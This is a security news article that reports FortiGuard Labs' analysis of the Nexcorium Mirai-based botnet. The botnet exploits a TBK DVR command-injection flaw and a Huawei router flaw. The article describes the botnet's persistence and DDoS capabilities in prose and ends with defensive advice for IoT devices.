Nexcorium Botnet Exploits TBK DVR Command Injection to Build Multi-Architecture DDoS Army
FortiGuard Labs has uncovered a campaign exploiting CVE-2024-3721 in TBK DVR systems to deploy Nexcorium, a multi-architecture Mirai-based botnet targeting ARM, MIPS, and x86-64 devices for DDoS attacks.
FortiGuard Labs has identified an active malware campaign that exploits a command injection vulnerability in TBK digital video recorder (DVR) systems to deploy a new Mirai-based botnet named Nexcorium. The campaign targets CVE-2024-3721, a flaw in TBK DVR devices, allowing attackers to gain initial access and install malicious binaries tailored for ARM, MIPS, and x86-64 Linux architectures. The discovery highlights the continued weaponization of IoT devices for large-scale distributed denial-of-service (DDoS) attacks.
The attack chain begins with crafted HTTP requests that abuse vulnerable parameters in the DVR's web interface to execute a downloader script. This script retrieves architecture-specific Mirai variant binaries and executes them with elevated privileges. Evidence within the attack traffic includes a custom HTTP header referencing "Nexus Team," which analysts believe may point to a previously untracked threat actor. Upon successful infection, the malware announces control of the compromised system to its command-and-control (C2) server.
Once deployed, Nexcorium initializes a configuration set hidden through XOR encoding. This configuration includes C2 server details, attack instructions, and a built-in credential list used for brute-force activity. The malware closely mirrors traditional Mirai architecture, with dedicated modules for scanning, persistence, and attack execution. The scanner component attempts to propagate by exploiting known weaknesses and leveraging default credentials over Telnet connections. Among its embedded exploits is CVE-2017-17215, a vulnerability affecting Huawei routers, which expands its reach beyond the initial DVR targets.
Persistence is achieved through several mechanisms. The malware modifies system initialization files, creates startup scripts, and registers system services to ensure execution after reboot. It also schedules recurring tasks via cron jobs, allowing it to survive system restarts and maintain long-term access. This multi-layered persistence strategy makes Nexcorium particularly difficult to eradicate from infected devices.
After establishing persistence, Nexcorium connects to a remote command server to receive instructions. It supports a wide range of DDoS methods, including UDP floods, TCP SYN floods, and application-layer attacks such as SMTP flooding. Attack commands are dynamically issued by the C2 infrastructure, enabling coordinated campaigns across infected devices. The malware can also terminate ongoing attacks or remove itself when instructed, suggesting centralized control over botnet operations.
The campaign underscores the persistent threat posed by IoT botnets. "Enterprises have had their fleets of IoT and OT devices used by Mirai and its variants for some time, particularly for DDoS attacks," said John Gallagher, vice president of Viakoo Labs. "Until more action is taken by enterprises to maintain cyber hygiene on IoT devices, this will continue because of the ease of infection and ability to move laterally." Security teams are advised to focus on foundational controls for IoT environments, including automated password and certificate management, firmware updates, and agentless discovery and remediation solutions.
The Nexcorium campaign serves as a stark reminder that unpatched IoT devices remain a prime vector for botnet recruitment. With the malware's ability to target multiple architectures and exploit both new and legacy vulnerabilities, organizations must prioritize IoT security to prevent their devices from being conscripted into DDoS armies.